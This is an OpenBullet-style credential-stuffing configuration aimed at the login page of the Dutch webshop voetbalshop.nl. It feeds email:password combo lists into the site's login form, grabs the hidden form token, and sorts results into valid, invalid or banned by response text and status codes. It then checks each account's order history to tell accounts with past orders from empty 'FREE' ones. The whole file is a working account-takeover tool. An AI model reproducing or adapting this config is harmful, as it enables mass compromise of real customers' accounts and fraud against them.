[SETTINGS]
{
  "Name": "Voetbalshop.nl",
  "SuggestedBots": 100,
  "MaxCPM": 0,
  "LastModified": "2020-05-09T01:34:02.1915493+02:00",
  "AdditionalInfo": "Custom: No orders",
  "Author": "Dedrilath",
  "Version": "1.4.4 [Anomaly]",
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "Base64": "",
  "Grayscale": false,
  "RemoveLines": false,
  "RemoveNoise": false,
  "Dilate": false,
  "Threshold": 1.0,
  "DiffKeep": 0.0,
  "DiffHide": 0.0,
  "Saturate": false,
  "Saturation": 0.0,
  "Transparent": false,
  "Contour": false,
  "OnlyShow": false,
  "ContrastGamma": false,
  "Contrast": 1.0,
  "Gamma": 1.0,
  "Brightness": 1.0,
  "RemoveLinesMin": 0,
  "RemoveLinesMax": 0,
  "Crop": false,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
REQUEST GET "https://www.voetbalshop.nl/customer/account/login" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

PARSE "<SOURCE>" LR "<input name=\"form_key\" type=\"hidden\" value=\"" "\" />" -> VAR "Token" 

REQUEST POST "https://www.voetbalshop.nl/customer/account/loginPost/" 
  CONTENT "form_key=<Token>&login%5Busername%5D=<USER>&login%5Bpassword%5D=<PASS>&send=" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "origin: https://www.voetbalshop.nl" 
  HEADER "pragma: no-cache" 
  HEADER "referer: https://www.voetbalshop.nl/customer/account/login" 
  HEADER "sec-fetch-dest: document" 
  HEADER "sec-fetch-mode: navigate" 
  HEADER "sec-fetch-site: same-origin" 
  HEADER "sec-fetch-user: ?1" 
  HEADER "upgrade-insecure-requests: 1" 
  HEADER "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "Mijn gegevens" 
  KEYCHAIN Failure OR 
    KEY "Ongeldige gebruikersnaam en/of wachtwoord." 
  KEYCHAIN Ban OR 
    KEY "Access denied" 
    KEY "<RESPONSECODE>" Contains "403" 
    KEY "503" 

REQUEST GET "https://www.voetbalshop.nl/sales/order/history/" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "<SOURCE>" DoesNotContain "Je hebt geen bestellingen geplaatst" 
  KEYCHAIN Custom "FREE" OR 
    KEY "Je hebt geen bestellingen geplaatst" 

